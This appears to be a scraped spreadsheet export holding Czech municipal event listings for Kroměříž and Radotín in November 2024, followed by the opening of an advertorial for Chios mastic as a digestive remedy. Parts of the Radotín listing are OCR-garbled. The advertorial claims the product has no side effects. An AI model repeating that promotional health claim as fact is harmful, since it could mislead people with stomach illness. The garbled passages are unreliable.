představení podzim 2024. Hraje Divadlo Radka Brzobohatého. Dům kultury www.dk-kromeriz.cz PÁ 15. 11. - SO 16. 11. D KROMĚŘÍŽSKÝ HÁČKOVACÍ MARATON 24hodinový maraton výroby háčkovaných hraček s charitativním cílem. Klub Starý pivovar SO 16. 11. 13.00 POSELSTVÍ MALÉHO PRINCE Seminář s lektorkou Hanou Švandelkovou zaměřený na podporu komunikace náročných témat. Na akci je nutné se předem objednat na tel. čísle 731 215 678. Akce je vhodná pro pedagogy, rodiče a dospělé návštěvníky. Muzeum Kroměřížska www.muzeum-km.cz NE 17. 11. 16.00 D STRAŠIDELNĚ KOUZELNÁ STEZKA Přijďte si na Šipku projít strašidelně kouzelnou stezku a k tomu si vyrobit něco kouzelného. SVČ Šipka www.svcsipka.cz ÚT 19. 11. 9.30 D VÍM, JAK SE MÁM? Workshop vhodný pro každého rodiče kladoucího si základní životní otázky a ochotného sdílet své postoje v kruhu ostatních rodičů. Provázet bude Veronika Habrová . Nutná registrace předem. Více info: habrova@klubickokm.cz, 777 031 252. Klubíčko Kroměříž www.klubickokm.cz ÚT 19. 11. 16.30 ŘECKO: SLOHY, ŘÁDY, RODY Přednáška Pavla Škrance o původu řádového tvarosloví kamenných řeckých chrámů v dřevěných konstrukcích. Z cyklu Rozhledy po pravěké a starověké architektuře II. Muzeum Kroměřížska www.muzeum-km.cz ÚT 19. 11. 18.00 KLAVÍRNÍ RECITÁL BORISE KRAJNÉHO Koncert uznávaného českého klavíristy, kroměřížského rodáka, absolventa Konzervatoře P. J Vejvanovského, jehož výtěžek bude věnován na zakoupení klavíru do Sněmovního sálu. V programu zazní skladby B. Smetany, L. van Beethovena, F. Chopina a J. Haydna. Kino Nadsklepí ÚT 19. 11. 19.00 KRÁSKA Z LEENANE Ochotnické představení v rámci předplatitelského cyklu na Starém pivovaře. Klub Starý pivovar www.dk-kromeriz.cz ST 20. 11. 19.00 EVANGELIUM PODLE BOHUMILA HRABALA Přednáška Pavla Hoška v rámci cyklu přednášek České křesťanské akademie. Arcibiskupské gymnázium www.krestanskaakademie.cz ST 20. 11. 20.00 PRAVIDELNÁ POZOROVÁNÍ K vidění bude Saturn , Jupiter, galaxie mlhoviny a hvězdokupy podzimní a zimní oblohy. Případné dotazy na místě zodpoví některý z regionálních amatérských astronomů. Hvězdárna Kroměříž www.dk-kromeriz.cz ČT 21. 11. 10.00 D VELRYBA A PRUHOVANÉ TRIČKO Klub Puntička pro děti 0-3leté a jejich doprovod. Zastavení nad knihou Marie Tiché. Knihovna Kroměřížska www.knihkm.cz ČT 21. 11. 16.30 NEJNOVĚJŠÍ ARCHEOLOGICKÉ OBJEVY NA HRADISKU U KROMĚŘÍŽE Přednáška Davida Parmy, archeologa Ústavu archeologické památkové péče Brno . Muzeum Kroměřížska www.muzeum-km.cz ČT 21. 11. 17.00 MONIKA HANYCH - PRÁVNÍ SYSTÉM V ČR, LIDSKÁ PRÁVA A SVOBODA PROJEVU Diskuze s Monikou Hanych , vedoucí analytického týmu na Ústavním soudu v Brně . Pořádá Europe Direct Kroměříž. Knihovna Kroměřížska www.knihkm.cz ČT 21. 11. 18.00 MAREK MEDUNA : KOMENTOVANÁ PROHLÍDKA Čtvrteční komentář autora aktuální výstavy. Galerie Pekelné sáně www.pekelnesane.cz ČT 21. 11. 18.00 TOMÁŠ VEJMOLA - AFRIKA S TUKTUKEM Stand up v rámci cyklu Procestujte svět s Domem kultury. Klub Starý pivovar www.dk-kromeriz.cz ČT 21. 11. 19.00 LA STRADA Strhující příběh o lásce a krutosti z cirkusového prostředí podle stejnojmenného filmu Federica Felliniho v podání Pražského komorního baletu. Dům kultury www.dk-kromeriz.cz PÁ 22. 11. 15.30 D ABECEDA ÚSPĚŠNÉHO PRVŇÁČKA Workshop na téma jak připravit předškoláka na vstup do školy. Provázet workshopem bude Terezie Jokl, speciální pedagožka. Nutná registrace předem. Více info: habrova@klubickokm.cz, 777 031 252. Klubíčko Kroměříž www.klubickokm.cz SO 23. 11. - NE 24. 11. D FESTIVAL ZDRAVÍ Akce zaměřená na zdravý životní styl, bioprodukty, výživu. Výstaviště Kroměříž www.hobbyvystaviste.cz NE 24. 11. 14.00 D VÝROBA ADVENTNÍCH SVÍCNŮ Vánoční dílnu pořádá SVČ Šipka. V ceně 650 Kč je zahrnutý veškerý materiál na tvorbu. SVČ Šipka www.svcsipka.cz PO 25. 11. 9.00 D ZDRAVÁ ŽENA POHLEDEM FYZIOTERAPIE Workshop pro všechny věkové kategorie. Nutná registrace předem. Více info: habrova@klubickokm.cz, 777 031 252. Klubíčko Kroměříž www.klubickokm.cz ÚT 26. 11. 16.30 KROMĚŘÍŽSKÉ INSPIRACE FRANTIŠKA KOŽÍKA A MAXE ŠVABINSKÉHO Přednáška Miroslavy Šudomové zaměřená na propojení životních etap dvou umělců inspirovaných přírodou, městem a něžným pohlavím. Muzeum Kroměřížska www.muzeum-km.cz ÚT 26. 11. 18.00 KLAVÍRNÍ DUO ELIŠKA NOVOTNÁ A LUKÁŠ MICHEL V rámci recitálu dvojice pianistů uslyší návštěvníci kompletní Smetanovu Mou vlast na čtyři ruce. Konzervatoř P. J. Vejvanovského www.konzkm.cz ST 27. 11. - PÁ 29. 11. D ADVENTNÍ PRODEJ VÝROBKŮ Prodej výrobky klientů aktivizačních dílen s adventní a vánoční tematikou. Knihovna Kroměřížska www.sskm.cz ST 27. 11. 15.00 a 19.00 JELEN ANEB 10 LET NA PRKNECH První adventní koncert. Dvojkoncert oblíbené hudební skupiny v rámci divadelního turné. Dům kultury www.dk-kromeriz.cz ST 27. 11. 20.00 D PRAVIDELNÁ POZOROVÁNÍ K vidění bude Saturn , Jupiter, galaxie mlhoviny a hvězdokupy podzimní a zimní oblohy. Případné dotazy na místě zodpoví některý z regionálních amatérských astronomů. Hvězdárna Kroměříž www.dk-kromeriz.cz ČT 28. 11. 15.00 D ROZSVÍCENÍ VÁNOČNÍHO STROMU Tradiční akce s adventním jarmarkem (9 – 18 h) a doprovodným kulturním programem. 15.00 Hudební vystoupení ZUŠ Kroměříž 15.15 Vystoupení Tanečního klubu Henzély 15.25 Vystoupení Tanečního klubu Gradace 15.45 Hudební vystoupení SZUŠ D-MUSIC 16.30 Slavnostní rozsvícení vánočního stromu 16.45 Vánoční show, Hudební divadlo HNEDLE VEDLE 17.40 Vánoční laser show 18.30 Prague QUEEN a David Uličník , koncert kapely Velké náměstí www.dk-kromeriz.cz ČT 28. 11. 15.00 TRÉNINK PAMĚTI Program z cyklu Akademie 3. věku (nejen pro seniory) s trenérkou Petrou Ježíkovou. Knihovna Kroměřížska www.knihkm.cz ČT 28. 11. 18.00 JINDŘICH ŠTREIT: KDE DOMOV MŮJ Čtvrteční setkání s Jindřichem Štreitem, známým českým fotografem, pedagogem, kurátorem a organizátorem kulturního života. Galerie Pekelné sáně www.pekelnesane.cz SO 30. 11. 12.30 D DEN PRO DĚTSKOU KNIHU Burza dětských knih s křtem knih regionálních autorů a doprovodným programem. Knihovna Kroměřížska www.knihkm.cz SO 30. 11. 15.00 D VYHLÁŠENÍ VÍTĚZŮ VÝTVARNÉ SOUTĚŽE KŮŇ MÝMA OČIMA Muzeum Kroměřížska www.muzeum-km.cz SO 30. 11. 16.00 D POPLETENÍ ČERTÍCI Písničková show pro děti s Míšou Růžičkovou . Dům kultury v Kroměříži www.dk-kromeriz.cz SO 30. 11 16.00 ZHODNOCENÍ 20 LET PŮSOBENÍ SCHPMT Chovatelská beseda pro členy Svazu chovatelů a příznivců moravského teplokrevníka i zájemce z řad veřejnosti. Muzeum Kroměřížska www.muzeum-km.cz PO 2. 12. 18.00 D BENEFIČNÍ KONCERT DÍVČÍHO PĚVECKÉHO SBORU SPGŠ KROMĚŘÍŽ Výtěžek koncertu půjde pro Korálky Kroměříž , z. s. Kostel Nanebevzetí Panny Marie VÝSTAVY A EXPOZICE do SO 31. 5. D VÝSTAVA Z DĚJIN CESTOVÁNÍ A TURISTIKY NA KROMĚŘÍŽSKU Výstavu si mohou zájemci prohlédnout v PO a ST od 8 do 17 a ÚT, ČT a PÁ od 8 do 14 hod. Státní okresní archiv Kroměříž www.kromeriz.mza.cz PÁ 20. 9. - NE 1. 12. NAŠE KONĚ Výstava přiblíží zajímavou historii chovu koní plemene moravský teplokrevník, plemene úzce spjatého s naším regionem. Chováni jsou koně především hnědáci, dále ryzáci, bělouši a vraníci. Návštěvníci se seznámí se způsoby sedlání i zapřahání a uvidí také typický kočár. Audiovizuální část pak návštěvníky provede osudy těchto jedinečných koní i jejich majitelů. Muzeum Kroměřížska www.muzeum-km.cz PÁ 11. 10. - NE 16. 3. 2025 D HRADISKO U KROMĚŘÍŽE. PEVNOST Z DOBY BRONZOVÉ Výstava představí Hradisko (místní část Kroměříže ), jednu z nejvýznamnějších archeologických lokalit nejen v České republice , ale i v celé střední Evropě . Seznámí se se všemi etapami jejího pravěkého osídlení. Muzeum Kroměřížska www.muzeum-km.cz ST 6. 11. - ST 4. 12. D POD MODRÝM NEBEM Přehlídka výtvarných prací účastníků 20. výtvarného Setkání Valtice 2024. V přízemí DK. Vernisáž 6. 11 v 17 h s hudebním doprovodem kapely Dr. Beat. Dům kultury www.dk-kromeriz.cz ST 6. 11. - ST 4. 12. D V NEBI Výstava připomínající tvorbu aktivních výtvarníků a bývalých členů SPVUK. V 1. patře DK. Vernisáž 6. 11 v 17 h s hudebním doprovodem kapely Dr. Beat. Dům kultury www.dk-kromeriz.cz STÁLÁ EXPOZICE EXPOZICE KARLA KRYLA Originální expozice předestírá dílo a myšlenky slavného kroměřížského rodáka v neobvyklé podobě. Klade důraz na osobní prožitky každého návštěvníka. Expozice Karla Kryla www.dk-kromeriz.cz STÁLÁ EXPOZICE D PAMÁTNÍK MAXE ŠVABINSKÉHO V šesti sálech památníku se lze seznámit s průřezem dílem Maxe Švabinského , slavného kroměřížského rodáka. Muzeum Kroměřížska www.muzeum-km.cz STÁLÁ EXPOZICE D POKLADY STARÉ PŮDY Interaktivní expozice zavede návštěvníky do podivuhodných světů plných fantazie a tajemství. Muzeum Kroměřížska www.muzeum-km.cz STÁLÁ EXPOZICE D HISTORIE UKRYTÁ POD DLAŽBOU MĚSTA Expozice umístěná v historickém sklepení podává kulturně historický obraz města Kroměříže od jeho vzniku do raného novověku. Muzeum Kroměřížska www.muzeum-km.cz STÁLÁ EXPOZICE D KROMĚŘÍŽ V SOUKOLÍ DĚJIN 1848 – 1948 Hledání identity malého města na pozadí velkých dějinných událostí. Muzeum Kroměřížska www.muzeum-km.cz STÁLÁ EXPOZICE D STRÁŽCI ČASU Expozice hodin a hodinových strojků. Muzeum Kroměřížska www.muzeum-km.cz KINO Aktuální informace naleznete vždy na stránce www. dk-kromeriz.cz/kino-nadsklepi nebo na Facebooku kina Nadsklepí. BIJÁSEK Nedělní pohádky v 15 h pro rodiny s dětmi. PYŠNÁ PRINCEZNA CZE 2024, 85 min, přístupné bez omezení, česky KAMARÁDI Z PAPUCHALKOVY SKÁLY IRL/UK 2024, 80 min, přístupné bez omezení, dabing ODVÁŽNÁ VAIANA 2 USA 2024, přístupné bez omezení, dabing PŘIDÁVÁME Přidané projekce úspěšných titulů za zvýhodněnou cenu. VLNY CZE 2024, 131 min, nevhodné pro děti do 12 let, česky VÝJIMEČNÝ STAV CZE 2024, 100 min, nevhodné pro děti do 12 let, česky VENOM: POSLEDNÍ TANEC USA 2024, 105 min, nevhodné pro děti do 12 let, titulky POKLAD CZE 2024, 100 min, přístupné bez omezení, česky PREMIÉRA Premiéry očekávaných titulů daného měsíce. KONKLÁVE USA 2024, 120 min, nevhodné pro děti do 12 let, titulky ANORA USA 2024, 139 min, nepřístupné pro děti do 15 let, titulky TAJEMSTVÍ SMRTI CZE 2024, 95 min, nevhodné pro děti do 12 let, česky RED ONE USA 2024, 123 min, nevhodné pro děti do 12 let, titulky GLADIÁTOR II USA 2024, 150 min, nepřístupné pro děti do 15 let, titulky i dabing TATAMI GEO/ USA 2023, 103 min, nepřístupné pro děti do 15 let, titulky HERETIK USA 2024, 110 min, nepřístupné pro děti do 15 let, titulky KINO ODPO Odpolední projekce za zvýhodněné vstupné 80 Kč. Pondělí 11. 11. 16:00 MARIA MONTESSORI FRA 2024, 100 min, přístupné bez omezení, titulky Čtvrtek 21. 11. 16:00 MORD CZE 2024, 85 min, nevhodné pro děti do 12 let, česky Středa 27. 11. 16:00 ZÁPISNÍK ALKOHOLIČKY + DISKUZE CZE 2024, 90 min, nepřístupné pro děti do 15 let, česky ARTKINO Nedělní projekce ve 20,00 h za snížené vstupné v přednáškovém sále. Neděle 3. 11. 20:00 KOS V OSTRUŽINÍ CHE 2023, 110 min, nepřístupné pro děti do 15 let, titulky Neděle 17. 11. 20:00 PREZIDENTKA CZE/SVK 2024, 109 min, nevhodné pro děti do 12 let, slovensky HALLOWEENSKÁ NOC SO 2. 11. - NE 3. 11. Maraton hororových filmů s doprovodným programem. Na programu budou letošní hororové novinky 18,00-19,45 Beetlejuice Beetlejuice 20,00-21,45 Havěť 22,00-0,00 Vetřelec: Romulus 0,30 vyhlášení hororové ankety 0,30-2,15 Longlegs 2,30-4,15 Duše prokletých 4,30-6,15 Abigail (všechny filmy jsou v originálním znění s titulky) Kino Nadsklepí www.dk-kromeriz.cz SPORT A SPORTOVNÍ AKCE celý listopad D BRUSLENÍ PRO VEŘEJNOST Přesný rozpis hodin vyhrazených pro bruslení veřejnosti najdete na www.szmk.cz – Zimní stadion – Rozpis Zimní stadion www.hkkm.cz SO 2. 11. 17:00 D HK KROMĚŘÍŽ – HC SPARTAK UHERSKÝ BROD Krajská liga mužů v hokeji. Zimní stadion www.hkkm.cz SO 16. 11. 17:00 D HK KROMĚŘÍŽ – HOKEJ UHERSKÝ OSTROH Krajská liga mužů v hokeji. Zimní stadion www.hkkm.cz SO 30. 11. 17:00 D HK KROMĚŘÍŽ – HC UHERSKÉ HRADIŠTĚ Krajská liga mužů v hokeji. Zimní stadion www.hkkm.cz D Označení programů pro děti, Z Označení programů zdarma | Vydavatel Kroměřížského zpravodaje neodpovídá za programové změny. Rubrika transition_slide PŘÍLOHA KROMĚŘÍŽSKÉHO ZPRAVODAJE ROK 2024</t>
  </si>
  <si>
    <t>20241101_691_3275389149_993295df0ec0b9ed9080.html</t>
  </si>
  <si>
    <t>993295df0ec0b9ed9080</t>
  </si>
  <si>
    <t>Kulturní program na listopad</t>
  </si>
  <si>
    <t>Kulturní program na listopad 51 IT KKCK - sál I I 19.00; Koncert: ■ VI Vzpomínka na Marsyas Písničky legendární skupiny s kapelníkem a členem poslední sestavy Marsyas Ondřejem Fenolem a vynikající zpěvačkou Barborou Červinkovou . Vstupné od 220 Kč 6 ЛТ KNIHOVNA X I RADOTÍN ■ W 1 10:00, První dobrodružství s knížkou aneb Narodil se čtenář Pravidelná akce pro děti do 3 let a jejich rodiče. KINO RADOTÍN 20:00, Vlny, ČR Dobový film Vlny režiséra Jiřího Mádla ukáže napínavé a doposud utajené příběhy novinářů Československého rozhlasu. Na konci 60. let, kdy zněl z rádiových vln rokenrol a studentské revolty měnily svět, nastoupí starší z bratrů do prestižní redakce rozhlasu. Záhy se ocitne v nebezpečném souboji redaktorů a tajných služeb. SKI A BIKE CENTRUM RADOTÍN 19:00, SBCRtalk: Daniel Poiman Přednáška známého ultracyklisty 7 ЛТ KINO RADOTÍN R I 20:00, Poklad, ČR ■ VI Jiří Langmajer , Veronika Khek Kubařová a dávno ztracený bájný poklad v exotické Indonésii . To jsou tři hlavní hráči dobrodružné komedie o hledání bohatství. To může být potopené v truhle na dně moře, zakopané v džungli na ostrově, ale možná je jen zapomenuté hluboko v našich srdcích. 8 »á KINO RADOTÍN МД 17:00, PRO DĚTI, ■ ■ *• Pyšná princezna, ČR Čeští tvůrci natočili moderní pojetí jedné z nejmilovanějších pohádek všech dob. Na plátna kin přichází animovaný film Pyšná princezna inspirovaný nesmrtelnou předlohou Boženy Němcové a kultovní hranou verzí Bořivoje Zemana . 20:00, Love 2, ČR Milostný vztah Matěje a Veroniky se mění v komplikovaný, život ohrožující trojúhelník. Brutální boj o moc v síti intrik a korupce ve stínu mafie, která se neštíti ani politických vražd. Thajsko se zdá být dost vzdálené. Ideální úkryt pro několik zločinců z východní Evropy , kteří netuší, že by se sami mohli stát snadnou kořistí větších dravců. 9 ЛЛ KINO RADOTÍN ХІІ 17:00, PRO DĚTI, ■ V V Moje kouzelná rodinka, AUS Nerozlučná dvojka vypráví příběh Dona, dřevěné loutky na útěku, a opuštěné plyšové hračky DJ Doggy Doga, který hledá opravdového kamaráda. Jejich cesty se zkříží v Central Parku a navzdory všem předpokladům i odlišnostem se spolu vydávají na dobrodružnou cestu New Yorkem . 20:00, John Wick: 10. výročí, USA Před deseti lety změnil akční žánr. John Wick. Na své desáté výročí se tahle legenda známá v podsvětí jako Baba Yaga vrací na omezenou dobu do kin. V limitovaném uvedení bude znovu na velkém plátně к vidění od 3. listopadu. W 1IF KINO RADOTÍN Np 17:00, PRO DĚTI, ■ Pyšná princezna, ČR 20:00, V kuchyni, USA Život v kuchyni newyorské restaurace, kde se během obědové špičky mísí kultury z celého světa. П ЛЛ KKCK - Fajnový PII dvůr ■ • 16:00; Svatý Martin na bílém koni: akce pro rodiny s dětmi 16:30; Legendy o sv. Martinovi : stínové divadlo (hrají děti z MŠ a ZŠ Petrklíč) 17:00; Lampiónový průvod z fajnového dvora к lávce u Berounky BAZÉN RADOTÍN 19:00, Pacific Crest Trail s Terezou a Lukášem Povídání o tom, jaké to je být půl roku v lese, nést si všechno na zádech, mít neustále hlad, sprchovat se jednou týdně a chodit od rána do večera cestou necestou, přes hory a brodit rozvodněné řeky. Л ЛТ KINO RADOTÍN I &amp;lt; X I 20:00, Ameri- I U. U Ikánka, ČR Režisér a producent Viktor Tauš přichází s filmovým zážitkem roku. Amerikanka vypráví svůj příběh netradičním stylizovaným jazykem, který připomíná surrealistický gejzír plný barev, života a snů. Byť ve filmu není jediná realistická scéna, intenzivní pocit reality mysl diváka ani na chvíli neopustí. Nic není skutečné, a přesto je úplné všechno, co na plátně uvidíte, skutečné. SKI A BIKE CENTRUM RADOTÍN 19:00, SBCRtalk: Domestici a RAAM Race Across America neboli RAAM má pověst nejtěžšího silniční závodu v kategorii Ultra. Martin a Tomáš ho jako první Češi zvládli pokořit v kategorii dvojic. Vzdálenost 4 936 km od západu na východ USA přejeli za neskutečných 8 dní a 8 hodin. 14. CT KKCK - Sál 19:00; DS Gen D: Mariano Svižná autorská konverzační komedie o třech mafiánech, kufru plném peněz a šmejdovi s hrnci. Vstupné od 150 Kč FARNÍ KOMUNITNÍ CENTRUM 18:00, Karlštejn - klenot Českého království Přednáška historicky Lenky Bobkové KINO RADOTÍN 17:00, Zápisník alkoholicky, ČR Celovečerní film Zápisník alkoholicky vypráví dramatický příběh mladé ženy bojující se závislostí na alkoholu . Hlavní hrdinkou (byť jako hrdinka mnohdy nepůsobí) je mladá maminka, která se rozhodla nevzdat, nastoupit léčbu a bojovat se svým démonem i o svou rodinu. Jak těžké je si problém s pitím přiznat? 20:00, Výjimečný stav, ČR Komedie Výjimečný stav vypráví příběh o jednom žárlivém výstupu, který přeteče do extrémního profesního selhání, ale zachycuje zároveň také další roviny dezinformačních kampaní, které se dotýkají blízkého okolí hlavního hrdiny. 15. PÁ KINO RADOTÍN 17:00, PRO DĚTI, Looney Tunes: Žvýkačková pohroma, USA Legendární dvojice, prasátko Pórky a kačer Daffy, se vrací v novém sci-fi dobrodružství Looney Tunes: Žvýkačková pohroma. 20:00, Gladiátor 2, USA Film se zaměřuje na příběh Luciuse (Paul Mescal), syna Lucilly ( Connie Nielsen ) a synovce Commoda, prohnaného syna římského vůdce Marka Aurelia, který zavraždil svého otce, zmocnil se trůnu a skončil v gladiátorské aréně s Maximusem, který, ač smrtelně zraněn, císaře probodl a pak se odebral do podsvětí, aby se shledal se svou mrtvou ženou a synem. 16. so KOSTEL SV. PETRA A PAVLA 10:00, Svatá Anežka Česká: 35. výročí svatořečení Hudebně-dramatické pásmo KINO RADOTÍN 17:00, PRO DĚTI, Pyšná princezna, ČR 20:00, Gladiátor 2, USA Lip KKCK-Sál I / Nr 10:30; DS Žlutý ■ f ■ I1L kopec: O králi Karlíčkovi Představení pro děti o nejslavnějším českém králi Karlu IV . Vstupné od 100 Kč KINO RADOTÍN 17:00, PRO DĚTI, Život к sežrání, ČR Animovaný film režisérky Kristiny Dufkové natočený podle knižního bestselleru Mikaéla Olliviera s humorem za doprovodu nadupaných songů sleduje první strasti, lásky i nástrahy dospívání. 20:00, Bratříček Karel, ČR Film Bratříček Karel ukazuje tragické osudy legendy dvou československých revolucí - 1968 a 1989. Dokument přibližuje spoustu neznámých událostí ze života Karla Kryla a představí zajímavé archivy, které zatím nebyly širší veřejnosti známy. АЛ ОТ KINO RADO™1 УЦ XI 10:00, Baby Bio, UU.UI Amerikánka, ČR 20:00, Gladiátor 2, USA 21. ČT KINO RADOTÍN 20:00; Rok vdovy, ČR Hlavní hrdinkou filmu Rok vdovy je tlumočnice Petra, která se vlivem tragické události musí smířit s tím, že se z ní ve čtyřiceti letech stala vdova. Brzy zjistí, že zármutek není jedinou výzvou, které musí čelit. Přidává se starost o dospívající dceru a tlak ze strany manipulativní tchyně. 22. PÁ KINO RADOTÍN 17:00, PRO DĚTI, Sobík Niko: Cesta za polární září, USA Sobík Niko celý život sní o tom, že se jednou stane vánočním sobem v Santově letce přesně jako jeho tatínek. Má to přece v genech! Netuší však, že se na volné místo v sobím spřežení hlásí i Stella. 20:00, Poklad, ČR ПО KINORADOTÍN xH 17:00. PRO DĚTI, “ ■ W Looney Tunes: Žvýkačková pohroma, USA 20:00, Hranice přežití, USA Před třemi lety se svět změnil к nepoznání. Na vrcholu potravního řetězce se ocitla děsivá monstra, která zabila 95 % lidské populace. Unikli jen ti, kteří se ukryli vysoko v horách. Přišli přitom o všechno, hlavně o své blízké. Dělicí čárou mezi životem a smrtí se stala výška 2 440 m. n. m., nad kterou krvelačné bestie nemůžou, a nikdo neví proč. To je hranice přežití. 24 NF^otín 17:00, PRO DĚTI, Pyšná princezna, ČR 20:00, Picasso: Rebel v Paříži , Itálie Pablo Picasso se sice narodil ve Španělsku , ale téměř celý svůj život strávil v Paříži . Přesto se ve francouzské metropoli často cítil jako cizinec a vyhnanec. Film Picasso - rebel v Paříži vypráví o tomto klíčovém období v životě světoznámého umělce a přináší naprosto nevídaný pohled na jeho dílo a tvorbu a načrtává portrét jeho komplikované osobnosti. ЛT KINO RADOTÍN / у Д I 20:00, Konkláve, Děj snímku se odehrává ve Vatikánu , kde se má odehrát jedna z nejtajnějších a nejstarších událostí na světě - volba nového papeže. Tou je pověřen kardinál Lawrence, který se však ocitá v centru spiknutí, které může otřást samotnými základy církve. no nTKKCK-Sál /П lil 19:00; Synchro- ŁU. U Inicita-jakse projevuje a jak je možné jí rozumět Přednáška psychoterapeuta, spisovatele a hudebníka Pjéra La Šé' ze. Vstupné od 300 Kč KINO RADOTÍN 17:00, EOS: Moje Národní galerie v Londýně , GB Dokument z cyklu Exhibition on Screen. Národní galerie v Londýně patří mezi nejprestižnější světové galerie umění . Je plná mistrovských děl a představuje nekonečný zdroj historie a příběhů. Čí příběhy ale vypráví? Síla velkého umění spočítá v jeho schopnosti komunikovat s kýmkoliv, bez ohledu na jeho umělecké znalosti, život nebo viru. 20:00, Poklad, ČR 29. PÁ KKCK - Sál 19:00; DJ Dino: Retro disco party Největší hity 80. a 90. let. autentické dobové drinky a soutěž o nej lepší kostým. Vstupné od 200 Kč KINO RADOTÍN 17:00, PRO DĚTI, Odvážná Vaiana 2, USA Vaiana, která zcela neočekávaně obdrží žádost o pomoc od svých odvážných předků, se společně s Mauim a zcela novou posádkou vydává na pouť po mořských dálavách Oceánie do nebezpečných a dávno zapomenutých vod, kde na ni čeká dobrodružství plné nástrah, s jakými se dosud nesetkala. 20:00, Výjimečný stav, ČR ЛП OH KINO RADOTÍN &amp;lt;11 ХІ I 17:00, PRO DĚTI, We UU Sobík Niko: Cesta za polární záři, USA 20:00, Radost na dosah, ČR Klára (Barbora Šťastná) je vztahovou koučkou už dlouhá léta, za která jí prošel pod rukama nespočet spokojených klientů, a je vyhlášenou jedničkou v byznysu. David (Saša Rašilov) je úspěšným marketingovým ředitelem zajeté firmy, ale jeho milostný život je na bodě mrazu. Od doby, kdy mu manželství zničila vztahová koučka, všechny podobné koučky nedokáže vystát. PRO SRNÍHO 1 ■ 1 1 SBORU ČS. CÍRKVE EVANGELICKÉ 17:00; 1. adventní koncert Sopranistka Markéta Fassati za doprovodu zvuku trubky Jiřího Krýsla a varhan Jiřího Kopečného . Vstupné dobrovolné 4 роп™?1 ■ ■ I I IW a technologie Interaktivní beseda nejen pro rodiče s autorem projektu Digiděti Janem Kršňákem . Vstupné od 160 Kč 5 pro^-. We I I IV 16:00-18:00; Setkání s Mikulášem , čertem a andělem na dvoře Divadelní spolek Gaudium Více informací na www.centrumkoruna.cz (předprodej vstupenek), www.kinoradotin.cz, www.knihovna-radotin.cz</t>
  </si>
  <si>
    <t>6560</t>
  </si>
  <si>
    <t>20241101_692_3264293076_dad923958fe7c35684b9.html</t>
  </si>
  <si>
    <t>dad923958fe7c35684b9</t>
  </si>
  <si>
    <t>Masticha: Přírodní řešení problémů s trávením a žaludkem</t>
  </si>
  <si>
    <t>Masticha: Přírodní řešení problémů s trávením a žaludkem 1. 11. 2024 | 6 minut radosti | Reklamní článek Trávicí problémy nejsou dnes ničím výjimečným. Pokud do sebe nechce ládovat léky s často nepříjemnými vedlejšími účinky, poradíme vám, jak se obtíží zbavit bezproblémově a hlavně čistě přírodně. Trávicí problémy se projevují různě a mají různé příčiny Křeče v břiše, bolesti břicha, bolesti žaludku, zácpa, průjem, nevolnost, zvracení, říhání, pach z úst, nepříjemný tlak žaludku, nadýmání… trávicích problémů a potíží se žaludkem je opravdu mnoho. Nejčastěji se jedná o reakci na něco, co jsme snědli, a co našemu trávení neudělalo dobře. Problémy většinou po chvíli samy od sebe odezní a my se zase cítíme fajn. Zpozornět byste rozhodně měli, pokud se tyto potíže objevují častěji a pravidelně. Jestliže je nebudete zavčasu řešit, můžete si snadno přivodit chronický zánět žaludku a jiné vážnější problémy, jejichž léčba je náročná – na čas, energii i na peníze. Naučte se poznat, kde je problém Pro to, abyste mohli své problémy včas a správně léčit, a nebo ještě lépe, abyste jim dokázali předcházet, je důležité si stanovit, co vás vlastně trápí. Naučte se přesně určit místo, kde se bolest objevuje – je totiž rozdíl mezi bolestí žaludku a bolestí břicha. Vnímejte, zda jde o bolest bodavou, nebo tupou, nebo spíše jen o tlak a nepříjemný pocit. Všechny tyto informace vám nebo vašemu lékaři pomohou stanovit přesnou diagnózu a navrhnout ideální léčbu. Všímejte si svého těla, jak reaguje na přijaté jídlo a zda nejsou potraviny, které mu vyloženě neprospívají – takovým se zkuste raději vyhnout a nepřetěžujte zbytečně své trávení. Základem je zdravý životní styl Nejlepší prevenci je dopřávat svému žaludku jen to nejlepší. Snažte se jíst co nejpestřeji a nejvyváženěji. Přijímejte dostatek bílkovin, tuků i cukrů – všechny tyto živiny jsou důležitými zdroji energie pro naše tělo a mají vliv na celou řadu funkcí v něm. Dbejte na to, abyste přijímali také všechny důležité vitamíny a minerály. Nepřejídejte se a zkuste co nejvíce omezit příliš tučná, kořeněná nebo také smažená jídla. Ta jsou známá tím, že žaludku neprospívají, asi nejčastějším důsledkem jejich požití je reflux, s kterým se nejspíše potkal každý z nás. Ale i tento nepatrný problém se, pokud mu nepředcházíme a naše tělo se s ním musí potýkat často a pravidelně, může rozvinout v závažnější onemocnění žaludku. Proto žádnou bolest, křeč či nepříjemnost, které se objevují v oblasti žaludku, nepodceňujte a snažte se jim do budoucna zabránit. Co vše může způsobovat bolest žaludku? Příčin bolesti v oblasti břišní je mnoho. Jak už jsme zmínili výše, nejčastěji se jedná o reakci na něco snědeného. Ovšem bolesti mohou signalizovat i mnohem vážnější problémy jako jsou žaludeční vředy, různá zánětlivá onemocnění (zánět slepého střeva, zánět slinivky břišní…), různé infekce (infekce močových cest, infekce bakterií Helicobacter pylori…), žlučové kameny, Crohnova choroba a mnoho dalšího. Kromě bolestí se mohou objevovat také pálení žáhy a další projevy, kterým je dobré věnovat pozornost. Pomohou vám totiž odhalit, jaká je pravá příčina vašich potíží. Každá bolest je signál, že se vašemu tělu něco nelíbí, a měli byste se mít rozhodně na pozoru. I když nemusí jít o nic vážného, vždy je dobré bolest žaludku nepodceňovat a věnovat jí patřičnou pozornost, abyste si nezpůsobili ještě více problémů v budoucnu. Potravinové alergie jsou na vzestupu Stále častěji se lidé potýkají s trávicími potížemi, které jsou způsobené určitými potravinami. Bohužel, čím dál více lidí trpí nějakou formou potravinové alergie, ať už jde o alergii na mléko, vejce, ořechy, ryby, obiloviny a další. Mnoho lidí zpočátku ani netuší, že jsou na dané potraviny alergičtí. Jestliže se u vás často objevuje bolest žaludku po jídle, měli byste si začít více všímat toho, co jíte, a zda se bolest žaludku neobjevuje vždy po té, co sníte nějakou konkrétní potravinu či složku potravy. U mnoha alergií či intolerancí naštěstí postačí. Ulevte svému trávení s pomocí přírody Chcete pro svůj žaludek a svůj trávicí systém jen to nejlepší? Zdravé stravování, dostatek fyzické aktivity, vyhýbání se alkoholu , kofeinu a tabáku jsou dobrými základy. Jestli ale chcete svému žaludku dopřát něco navíc, vyzkoušejte Chioskou mastichu. Ta je známá svými blahodárnými účinky právě na trávení a funguje jako skvělá prevence, ale i pomoc při léčbě některých potíží. Výhodou je také fakt, že masticha je čistě přírodní a její užívání nedoprovázejí žádné vedlejší účinky. 100% přírodní kvalitní doplňky zdraví pomohou vašemu trávicímu systému správně fungovat a vám lépe žít. 